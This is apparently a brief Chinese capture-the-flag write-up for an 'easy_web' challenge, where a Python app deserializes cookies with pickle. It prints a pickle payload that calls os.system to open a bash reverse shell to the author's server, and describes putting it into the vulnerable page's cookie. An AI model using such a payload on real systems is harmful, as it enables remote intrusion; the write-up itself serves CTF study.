前言

菜鸡无聊做题

刷题

easy_web

给了一个docker,先看看python文件,发现Serializer字样,虽然用了不熟悉的包,但可以猜测是pickle反序列化
装一波依赖,调试一下

疯狂F11
先获取cookie,然后进入反序列化过程

解码,反序列化

获取对象后再次序列化,load

一开始准备逆向解码,但发现机制太复杂,不如运行中截断,直接把对象替换成自己的。

b'(cos\nsystem\nS\'bash -c "bash -i >& /dev/tcp/<vps>/7776 0>&1"\'\no.'

从页面获取cookie,扔到vuln页面的cookie里面就出了


"孓然一身 , 了无牵挂"